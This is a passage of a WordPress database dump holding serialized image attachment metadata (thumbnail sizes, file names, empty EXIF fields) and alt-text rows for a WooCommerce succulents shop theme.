pg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-600x431.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"h8-background-img-1-1-1024x736.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:736;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-768x552.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:552;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:35:\"h8-background-img-1-1-1536x1104.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:34:\"h8-background-img-1-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"h8-background-img-1-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:35:\"h8-background-img-1-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1028,4248,'_wp_attached_file','2018/02/h8-background-img-1.jpg'),(1029,4248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1380;s:4:\"file\";s:31:\"2018/02/h8-background-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h8-background-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-600x431.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-1024x736.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:736;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-768x552.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:552;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1536x1104.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h8-background-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-600x431.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1030,154,'_wp_attachment_image_alt','o'),(1031,164,'_wp_attachment_image_alt','a'),(1032,166,'_wp_attachment_image_alt','o'),(1033,184,'_wp_attachment_image_alt','a'),(1034,194,'_wp_attachment_image_alt','o'),(1035,3515,'_wp_attachment_image_alt','a'),(1036,3516,'_wp_attachment_image_alt','a'),(1037,3236,'_wp_attachment_image_alt',''),(1038,3238,'_wp_attachment_image_alt','o'),(1039,3261,'_wp_attachment_image_alt','o'),(1040,3262,'_wp_attachment_image_alt','o'),(1041,3263,'_wp_attachment_image_alt',''),(1042,3264,'_wp_attachment_image_alt',''),(1043,3265,'_wp_attachment_image_alt','o'),(1044,3266,'_wp_attachment_image_alt','o'),(1045,3274,'_wp_attachment_image_alt','a'),(1046,3275,'_wp_attachment_image_alt','o'),(1047,3276,'_wp_attachment_image_alt','a'),(1048,3278,'_wp_attachment_image_alt','o'),(1049,912,'_wp_attachment_image_alt','a'),(1050,1554,'_wp_attached_file','2018/01/h7-img-10.jpg'),(1051,913,'_wp_attachment_image_alt','o'),(1052,1554,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:431;s:4:\"file\";s:21:\"2018/01/h7-img-10.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-10-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-10-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-10-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h7-img-10-550x431.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h7-img-10-550x431.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-10-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-10-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1053,3526,'_wp_attached_file','2018/02/landing-coming-soon.jpg'),(1054,3526,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:462;s:4:\"file\";s:31:\"2018/02/landing-coming-soon.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-coming-soon-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-768x444.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-550x462.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-coming-soon-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-600x347.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:347;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-coming-soon-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1055,1194,'_wp_attachment_image_alt','a'),(1056,3516,'_wp_attachment_image_alt','a'),(1057,3526,'_wp_attachment_image_alt','a'),(1058,1195,'_wp_attached_file','2018/01/product8-gallery2-1.jpg'),(1059,1195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2018/01/product8-gallery2-1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"product8-gallery2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"product8-gallery2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1060,939,'_wp_attached_file','2018/01/h8-background-img-1-1.jpg'),(1061,939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1380;s:4:\"file\";s:33:\"2018/01/h8-background-img-1-1.jpg\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"h8-background-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-600x431.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"h8-background-img-1-1-1024x736.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:736;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1-768x552.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:552;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1062,3279,'_wp_attached_file','2018/02/h3-slide3-graphic-4-1.png'),(1063,3279,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:798;s:6:\"height\";i:506;s:4:\"file\";s:33:\"2018/02/h3-slide3-graphic-4-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-600x380.png\";s:5:\"width\";i:600;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-300x190.png\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-768x487.png\";s:5:\"width\";i:768;s:6:\"height\";i:487;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-550x506.png\";s:5:\"width\";i:550;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-550x506.png\";s:5:\"width\";i:550;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-600x380.png\";s:5:\"width\";i:600;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"h3-slide3-graphic-4-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1064,3531,'_wp_attached_file','2018/02/animation-holder-1.jpg'),(1065,3531,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:925;s:6:\"height\";i:659;s:4:\"file\";s:30:\"2018/02/animation-holder-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"animation-holder-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-600x427.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-768x547.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:547;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-925x550.jpg\";s:5:\"width\";i:925;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-550x659.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"animation-holder-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-600x427.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1066,4249,'_wp_attached_file','2018/02/h3-slide3-graphic-4.png'),(1067,4249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:798;s:6:\"height\";i:506;s:4:\"file\";s:31:\"2018/02/h3-slide3-graphic-4.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-600x380.png\";s:5:\"width\";i:600;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-300x190.png\";s:5:\"width\";i:300;s:6:\"height\";i:190;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-150x150.